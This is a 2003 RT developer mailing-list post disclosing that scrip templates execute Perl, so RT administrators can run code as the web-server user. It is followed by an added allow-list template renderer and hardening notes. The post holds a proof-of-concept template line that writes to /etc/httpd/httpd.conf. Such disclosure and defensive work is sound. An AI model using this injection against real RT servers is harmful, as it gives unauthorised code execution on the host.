[rt-devel] Security Problem in 2.0.15
Warnke, Andreas
Andreas.Warnke at 3SOFT.de
Fri Feb 21 10:24:05 EST 2003
Hello,
Administrators of RT can do everything on the server the wwwrun user can do:
Write a Scrip like:
Subject: AutoReply: {$Ticket->Subject}
Greetings,
This message has been automatically generated in response to the
creation of a trouble ticket regarding:
"{$Ticket->Subject()}",
a summary of which appears below.
Please don't reply to this message. Your ticket has been
assigned an ID of [{$rtname} #{$Ticket->id()}].
-------------------------------------------------------------------------
{open DEBUG, ">>/etc/httpd/httpd.conf"; print DEBUG "#oh shit!"; close DEBUG; $Transaction->Content()}
--
You can execute any Perl code on the server even if you have no access to the server. This is a bit scary, from my point of view. I hope you have set this straight in RT3?
Kind Regards
Andreas Warnke
--
Andreas Warnke
3SOFT GmbH, Frauenweiherst. 14, 91058 Erlangen
Tel.: +49-9131-7701-274 mailto:Andreas.Warnke at 3SOFT.de
Fax: +49-9131-7701-333 http://www.3SOFT.de
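The report above boils down to one design decision: the text between braces in a scrip template is handed to the Perl interpreter, so anyone who may edit a template runs code as the web-server user. The following is an added example (not RT's own code and not from the poster) of the alternative design a defender would want: a renderer that only substitutes a fixed allow-list of placeholders and refuses any block it does not recognise, instead of evaluating it. The template text, the placeholder names, the `render_template` function and the ticket values are all constructed for this example.

```perl
#!/usr/bin/perl
# Added example, not RT's code: render an RT-style scrip template by
# substituting an allow-list of placeholders instead of evaluating the
# text between braces as Perl. Anything else in braces aborts rendering,
# so a template author cannot run code as the web-server user.
use strict;
use warnings;

# Allow-list: placeholder text exactly as written in the template, mapped
# to a function that fetches the value from a context hash. Nothing that
# is not a key of this hash is ever evaluated.
my %allowed = (
    '$rtname'                 => sub { $_[0]{rtname} },
    '$Ticket->id()'           => sub { $_[0]{ticket}{id} },
    '$Ticket->Subject'        => sub { $_[0]{ticket}{subject} },
    '$Ticket->Subject()'      => sub { $_[0]{ticket}{subject} },
    '$Transaction->Content()' => sub { $_[0]{transaction}{content} },
);

# Replace every {...} block. Surrounding whitespace inside the braces is
# ignored; a block whose text is not in the allow-list is collected and
# the whole render is refused, rather than the block being passed to eval.
sub render_template {
    my ($template, $ctx) = @_;
    my @rejected;
    my $out = $template;
    $out =~ s/\{([^{}]*)\}/
        my $expr = $1;
        $expr =~ s|^\s+||;
        $expr =~ s|\s+$||;
        if (my $get = $allowed{$expr}) {
            $get->($ctx);
        } else {
            push @rejected, $expr;
            '';
        }
    /ge;
    die "refused to render template; unknown block(s): @rejected\n" if @rejected;
    return $out;
}

# Constructed ticket data standing in for RT's $Ticket / $Transaction objects.
my %ctx = (
    rtname      => 'ExampleRT',
    ticket      => { id => 42, subject => 'Printer on floor 3 jammed' },
    transaction => { content => 'It is stuck again.' },
);

# A template that uses only allow-listed placeholders renders normally.
my $benign = "Subject: AutoReply: {\$Ticket->Subject}\n"
           . "Your ticket has been assigned an ID of [{\$rtname} #{\$Ticket->id()}].\n";
print render_template($benign, \%ctx);
# prints:
#   Subject: AutoReply: Printer on floor 3 jammed
#   Your ticket has been assigned an ID of [ExampleRT #42].

# A block that carries code instead of a bare placeholder (a constructed,
# harmless stand-in here) is refused instead of executed.
my $hostile = "Regarding {\$Ticket->Subject()}\n"
            . "{ some_perl_code(); \$Transaction->Content() }\n";
my $result = eval { render_template($hostile, \%ctx) };
print "refused: $@" unless defined $result;
# prints:
#   refused: refused to render template; unknown block(s): some_perl_code(); $Transaction->Content()
```

The point of the allow-list is that template authorship stops being equivalent to shell access: the set of things a template can do is enumerated in one place and reviewed like code. If the code-evaluating template engine is kept instead, the remaining controls are restricting who may edit scrip templates and running the evaluation inside a Safe compartment with a restrictive opcode mask, which limits but does not remove the risk, since it still evaluates whatever the author wrote.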